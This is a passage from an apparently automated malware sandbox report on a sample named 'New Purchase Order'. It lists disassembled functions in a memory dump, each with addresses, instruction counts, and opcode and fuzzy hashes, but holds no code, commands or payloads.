                          • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                          • Instruction Fuzzy Hash: 5511C6756166C2EBEB2E972C8544B257B94AB01B5CF1A00A0ED61C7642F328C942C251
                          Function 011BE75D Relevance: .1, Instructions: 54COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                          • Instruction ID: 0ed372d8c612a2d41679bd68cf869e4a1b7ea81e2b7ace6e344259f1f7f23e2b
                          • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                          • Instruction Fuzzy Hash: 6101F972602905AFE72D5F58CC80FD67BA9EF80754F058024EA059B260E775DD40CBD0
                          Function 0112A250 Relevance: .1, Instructions: 52COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                          • Instruction ID: 71be8a19088f684dca3158df5afd3600f6593957d1d4a20d02c44084c40a76b2
                          • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                          • Instruction Fuzzy Hash: 190149314047329BCB398F59E840A32BBF6FF56B60701892DFC958BA81D331D420CB60
                          Function 01204940 Relevance: .1, Instructions: 52COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 74b800becc606bc159b92d5b0e4bee6f7ffca6ff1bd89f0506c8425a8017136f
                          • Instruction ID: a2ac3b2d32b3030b6f876c9c0d8331a043a646e7fb0866c592af4797c46939af
                          • Opcode Fuzzy Hash: 74b800becc606bc159b92d5b0e4bee6f7ffca6ff1bd89f0506c8425a8017136f
                          • Instruction Fuzzy Hash: C2010432561556AFC333EF1C9800E12B7A8EB81774B268325EB689B1D7D730D801CBC0
                          Function 011AE1D0 Relevance: .1, Instructions: 51COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 821cfdb7f7777809c0eab1480a54dbea18bc7919f0de8e1871054e316746842b
                          • Instruction ID: 87df5ead051e11c44ff55a9dabda6457b1ccad46ad8ff98b36d9f57b85d84d76
                          • Opcode Fuzzy Hash: 821cfdb7f7777809c0eab1480a54dbea18bc7919f0de8e1871054e316746842b
                          • Instruction Fuzzy Hash: AE11A136242241EFDB19EF19CD80F167BB8FF54B58F1000A5ED059B661D335ED01CA90
                          Function 01136259 Relevance: .1, Instructions: 51COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3cc030bca722b04af536d151ef34807c74cb14d7275fa288d9a6e7b7c572d582
                          • Instruction ID: d8ca5bf1a33accc01375b8e4493f20dcfd9c0766c163b011de22840833785487
                          • Opcode Fuzzy Hash: 3cc030bca722b04af536d151ef34807c74cb14d7275fa288d9a6e7b7c572d582
                          • Instruction Fuzzy Hash: F7115E71541229ABEB39AB64CC41FED7374FB44714F5041D4A314A61E0DB709E91CF85
                          Function 011B6050 Relevance: .0, Instructions: 50COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1b657f3cb14aa8e74b451c16f387aeaa46c8e7fa590575d87aedc84abafdcff6
                          • Instruction ID: 8118c203469a48c3bacdc926394b444d2a89a780a653a29f32ce28acd216f3f9
                          • Opcode Fuzzy Hash: 1b657f3cb14aa8e74b451c16f387aeaa46c8e7fa590575d87aedc84abafdcff6
                          • Instruction Fuzzy Hash: 3C111772900119ABCB25DB95CC84DEFBB7CEF58258F044166E906E7211EB34AA15CBA1
                          Function 0113208A Relevance: .0, Instructions: 50COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                          • Instruction ID: f8129a8681817acd9ea3289079ffcac2740282288d7d7248795d4b24c372af30
                          • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                          • Instruction Fuzzy Hash: 180128322001118BEF1DBA1DD880F56B767BFC4700F5681A9ED158F24ADB71CC81C790
                          Function 011C6500 Relevance: .0, Instructions: 50COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 38230ac6c351fe2aa1c094fcc2441b31efb457ea4d3342ad7e00eaac74356620
                          • Instruction ID: c163e7a1054e8bec3aac0fc582ce7a08bfbc5e1d9f8fb7d4618e95b774d33886
                          • Opcode Fuzzy Hash: 38230ac6c351fe2aa1c094fcc2441b31efb457ea4d3342ad7e00eaac74356620
                          • Instruction Fuzzy Hash: 751104326401469FC319CF58D800BA6FBB9FB6A754F188159E848CB315D732EC80CBA0
                          Function 011BC810 Relevance: .0, Instructions: 50COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7b743588e5a55cddcb2732d1c52cfd01924245cbf3190e513e14056ce87dab92
                          • Instruction ID: 17a60e6e9cce8c413f2b4e3a14c0124224a08a2b7146967509920fc5170d3517
                          • Opcode Fuzzy Hash: 7b743588e5a55cddcb2732d1c52cfd01924245cbf3190e513e14056ce87dab92
                          • Instruction Fuzzy Hash: FE1118B1A00209ABCB04DFA9D581AAEBBF8FF58250F10406AE905E7351D774EA018BA4
                          Function 011DEA60 Relevance: .0, Instructions: 50COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a78e154c4e78bb7b2e59e5259f301f90702d9cb77288569654090b0ac68defb7
                          • Instruction ID: bf274b290b7e70897c88cae5008feabb12b5df5a4354a92b7a2bb607054dd257
                          • Opcode Fuzzy Hash: a78e154c4e78bb7b2e59e5259f301f90702d9cb77288569654090b0ac68defb7
                          • Instruction Fuzzy Hash: D2012435142222ABCB3EEF198840D7ABBB9FF51A56B05442EF1010F200CB34DC81CBD2
                          Function 0112C020 Relevance: .0, Instructions: 49COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                          • Instruction ID: a9ec60acb6d62d583aab1caa749eb4286d3685965a3c7a31f2bcc6a2ac33daee
                          • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                          • Instruction Fuzzy Hash: 9A012D321007459FDF2AA669E400F6B77F9FFD5654F05841EE65687580DF74E401CB60
                          Function 011720F0 Relevance: .0, Instructions: 49COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2ebb99b94afeaebd494d740ff86d9a705d9ab6fd8351116e21a0a93cb444fe14
                          • Instruction ID: 6f2c3153c28304e1bd799c28fc037f9a6af236a5af57994e61745b38ca6a899c
                          • Opcode Fuzzy Hash: 2ebb99b94afeaebd494d740ff86d9a705d9ab6fd8351116e21a0a93cb444fe14
                          • Instruction Fuzzy Hash: 78116935A0020DEBDB19EFA4D850BAE7BB5FF44644F004059E9019B390EB35AE12CB91
                          Function 0116E5CF Relevance: .0, Instructions: 49COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3f8daee65e395da6b8152ca3670c1110377bfa440b6923336f7f2d5e01171251
                          • Instruction ID: 6ad7132abd32292892442758fc28d493b52c52723399bf37b64ddf5e67b04899
                          • Opcode Fuzzy Hash: 3f8daee65e395da6b8152ca3670c1110377bfa440b6923336f7f2d5e01171251
                          • Instruction Fuzzy Hash: 80012B72311515BFC319BB79CD44E57BBACFF54A587000626F50587550DB34EC41C6E0
                          Function 011C69C0 Relevance: .0, Instructions: 49COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0dcd5e71bddf99afaade4241b34dbbfd7c4828b852ab5e9469a8d59e4932ebe9
                          • Instruction ID: b27e1250972a0e92ba74a059398482acea4262f20f3d0e84503fec2c7743dd3d
                          • Opcode Fuzzy Hash: 0dcd5e71bddf99afaade4241b34dbbfd7c4828b852ab5e9469a8d59e4932ebe9
                          • Instruction Fuzzy Hash: B101FC32224212DBD328DF6DD8489ABBBA8FF54A64F11412DE96987380E730D901C7D2
                          Function 011BC460 Relevance: .0, Instructions: 48COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b14c11ad0d46b27695cee5854b6735b3b91100c2af9c962d041d88bfcefb3d8d
                          • Instruction ID: 4b07a2d43bbb7ad96fd467d331262272b2fe75ecc7a849e9c2b30086f1c7ffbb
                          • Opcode Fuzzy Hash: b14c11ad0d46b27695cee5854b6735b3b91100c2af9c962d041d88bfcefb3d8d
                          • Instruction Fuzzy Hash: D8115B71A00209EBDB19EF68C884EEE7BB5EB48254F004059F90197340DB38EE11CB90
                          Function 011BC97C Relevance: .0, Instructions: 48COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8b4c35addb409575679fbf7c7c7e0da7a4aef5ea2f6f39d27b074428d2a85b18
                          • Instruction ID: 7d5349ebd3c6542194706edb52272181aacf2a6ccb3418347373cdb72bed3a10
                          • Opcode Fuzzy Hash: 8b4c35addb409575679fbf7c7c7e0da7a4aef5ea2f6f39d27b074428d2a85b18
                          • Instruction Fuzzy Hash: 371127B16183099FC714DF69D441A9BBBE4AF98610F00451AF998D7391E730E900CB92
                          Function 011BCA11 Relevance: .0, Instructions: 48COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a26301141127b7766546bb4bc10be4f8082f25fb367c2e03f089054dd65454eb
                          • Instruction ID: fa650b115be85226893aa7ca36cb1daa524293f2a2acfa91aed5ff80be000e5e
                          • Opcode Fuzzy Hash: a26301141127b7766546bb4bc10be4f8082f25fb367c2e03f089054dd65454eb
                          • Instruction Fuzzy Hash: 771127B16183099FC714DF69D481A9ABBE4BF99750F00851AF998D73A0E730E9008B92
                          Function 01204A80 Relevance: .0, Instructions: 48COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                          • Instruction ID: 401f8e9c22a8526c35fe9407d5aef8faae26c7b5eb81b0c8466842d8f835ba25
                          • Opcode Fuzzy Hash: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                          • Instruction Fuzzy Hash: 5F01D8332106429FDB26AA99D854F57B7EAFBC5610F048619EB438B691DAB0F880C754
                          Function 0114E016 Relevance: .0, Instructions: 46COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                          • Instruction ID: 7f300aba059b81e2d7dd6016bce552a0de5d932f4b6130685b8607cbf99d4923
                          • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                          • Instruction Fuzzy Hash: E3017C323056849FE32A972DC948F3A7BE8FF85B54F0944A1F915CB692D72CDC40C622
                          Function 0112826B Relevance: .0, Instructions: 46COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: aae522d0924619c42d1399b5972783673fa084e7610a4e41572b89ba280b5ec4
                          • Instruction ID: b3ddab30d3727aa459fb5d65f21cac12cae2adb5efd6b49be22f3eed08ee4995
                          • Opcode Fuzzy Hash: aae522d0924619c42d1399b5972783673fa084e7610a4e41572b89ba280b5ec4
                          • Instruction Fuzzy Hash: C501F232700515EBD71CEB69E854AAEB7F9FF81224B168029DA02A7690EF30DD01C791
                          Function 011DEB50 Relevance: .0, Instructions: 46COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: c52d7a752d442757340e00a56191cef41c67008b990f83f52315ce52b85151be
                          • Instruction ID: be60d6cd46d3faaeea6148121abded3ea194be6e25c78ffe440e218f4c416c12
                          • Opcode Fuzzy Hash: c52d7a752d442757340e00a56191cef41c67008b990f83f52315ce52b85151be
                          • Instruction Fuzzy Hash: DE01F271241711AFD3399F19E800F5ABAA8EF58F54F01082AF6069F390C7B4A840CB94
                          Function 01132582 Relevance: .0, Instructions: 45COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ad5c3250b3355d56f8c32afa1862367200a882b7d42b430f9e3ade75dec968d1
                          • Instruction ID: fd111308ec764c45ad7e9e3926bebf8ee258531ab9570b6c5e7b6bcd32ff1f4f
                          • Opcode Fuzzy Hash: ad5c3250b3355d56f8c32afa1862367200a882b7d42b430f9e3ade75dec968d1
                          • Instruction Fuzzy Hash: 21F0A932641A21B7C739AF568D44F57BAA9EBD4E94F154029A60597640D730DD01CAA0
                          Function 0115C073 Relevance: .0, Instructions: 43COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                          • Instruction ID: 81b986f0858447c1d8c28541c602c72fbbe8565041922cfaa9e2400acaaf7429
                          • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                          • Instruction Fuzzy Hash: EBF0AFB2600615ABD328CF4DD840E57FBEEDBD1A94F048128A915D7220EA31DD04CB90
                          Function 0112C310 Relevance: .0, Instructions: 43COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                          • Instruction ID: 5bcc077bfe45ebaa11ffba8507b67f759efe56c73b465411656c06ae09f1b03a
                          • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                          • Instruction Fuzzy Hash: C2F0FC372486339BD73E16595840B6FAA95CFE5AA4F1A0436E3099B200CB648D1256D1
                          Function 0120634F Relevance: .0, Instructions: 43COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 28932b2bea912d04e442841842b86fcfc474c9c53612ebe335e8469718354509
                          • Instruction ID: f531c843447057c7d641dac0a474206be0886c923241527e06d87e2207b28f72
                          • Opcode Fuzzy Hash: 28932b2bea912d04e442841842b86fcfc474c9c53612ebe335e8469718354509
                          • Instruction Fuzzy Hash: E9018F71A2020AEFDB04DFA9E441AAEB7F8FF58704F10402AF910E7390D7749A008BA0
                          Function 0120625D Relevance: .0, Instructions: 43COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 70f8649ed75e9944fbe0d5ca069ebd08c39642235260f619d580c0a4e599ce7a
                          • Instruction ID: 9aac4c25ab6c7117058583643c922e193af3eeae113c7d46660aa08d10bdf98b
                          • Opcode Fuzzy Hash: 70f8649ed75e9944fbe0d5ca069ebd08c39642235260f619d580c0a4e599ce7a
                          • Instruction Fuzzy Hash: 8D018F71A1020AEFDB04DFA9D441AAEB7F8FF58304F10402AF910E7391D774AA00CBA0
                          Function 012062D6 Relevance: .0, Instructions: 43COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9af02899f2a027b82aad155926ae3a37fc90222d4d2603ef00107d3687252f57
                          • Instruction ID: e5eccfa2867fe8b58c0b1c4c8f11c8c4072ecdf859cba3122611f6be181a17b2
                          • Opcode Fuzzy Hash: 9af02899f2a027b82aad155926ae3a37fc90222d4d2603ef00107d3687252f57
                          • Instruction Fuzzy Hash: 25018471A1020AEFDB04DFA9D44199EB7F8FF58704F50401AF910E7391D7749E008BA0
                          Function 0116CA6F Relevance: .0, Instructions: 42COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                          • Instruction ID: f17f657f0e1acd697b1b62450c3ef36a153d0e1e1e28677826c9cda08d0cbf1b
                          • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                          • Instruction Fuzzy Hash: 4401F4362006859BE32E971DC805F9EBF9CEF41754F0940A5FA84CB6A1E779C810C251
                          Function 012061E5 Relevance: .0, Instructions: 41COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 829595c62ed29feecc5b1a7bc32d0c4c9441aa016d99fb0340f9d726a817cf0d
                          • Instruction ID: 9058bfe48d86dc619223bb361e3a140f25868217693788f5327ff99680a7d652
                          • Opcode Fuzzy Hash: 829595c62ed29feecc5b1a7bc32d0c4c9441aa016d99fb0340f9d726a817cf0d
                          • Instruction Fuzzy Hash: 03018F71A10259EFDB05DFA9D845AEEBBF8BF58314F14005AE500A7380D774EA01CB95
                          Function 011B63C0 Relevance: .0, Instructions: 41COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                          • Instruction ID: 77f008e43b86789cfb5bbdcd4b0d856c33a7073a09d3e4e46127f48acf771b84
                          • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                          • Instruction Fuzzy Hash: E7F0F97220001DBFEF059F95DD80DEF7B7EEB59698B104125FA1192160D735DD21EBA0
                          Function 011BA4B0 Relevance: .0, Instructions: 40COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c0c30b30493b1c84e02619277ebd89f78e5710777ae189fcf6bb13cb790c0433
                          • Instruction ID: 0a4b3fca6c183f8d37e4c74d6cf9867e5b8fa7c038addec004a53fe182ac6cc4
                          • Opcode Fuzzy Hash: c0c30b30493b1c84e02619277ebd89f78e5710777ae189fcf6bb13cb790c0433
                          • Instruction Fuzzy Hash: 19018936100219ABCF269E84E844EDE7F66FF4C754F068101FE1866220C336D970EB81
                          Function 0112C0F0 Relevance: .0, Instructions: 39COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 304251878284b713c8060242cf3853fc41db4a66cc798d0c24d69f3ae3befdce
                          • Instruction ID: bcf8d1811b137042733d4bc83786d93670e86d53a25a8b2a33c984e1a919f976
                          • Opcode Fuzzy Hash: 304251878284b713c8060242cf3853fc41db4a66cc798d0c24d69f3ae3befdce
                          • Instruction Fuzzy Hash: 61F024716042619BF71DA61D9D02B66329AEBD0650F35C02AEB058B2C1EBB1EC1183D5
                          Function 0116656A Relevance: .0, Instructions: 39COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 94c4a923a819c7a2392a2f4c8184d9ce29b7a1b1621a738148161288101f375a
                          • Instruction ID: f63cc4e7b64edc0b958392079a08b3c83f1ab5ecb7c6fdc047189ad46e2d57fd
                          • Opcode Fuzzy Hash: 94c4a923a819c7a2392a2f4c8184d9ce29b7a1b1621a738148161288101f375a
                          • Instruction Fuzzy Hash: 1001AF74204A819BE33E9B2CCD49B693BA8BF40B84F894194FA018BAD6D7A9D411C211
                          Function 011D437C Relevance: .0, Instructions: 37COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                          • Instruction ID: ca3e3e9539e5e73006ab0efda15a2e1b46296ad3134e162d5e4f9fe072a61df9
                          • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                          • Instruction Fuzzy Hash: 1FF02E31749E3367E77DAA6F8410B2FB6969F90D00B05052C9651CBE80DF30DC00C784
                          Function 011BE872 Relevance: .0, Instructions: 36COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
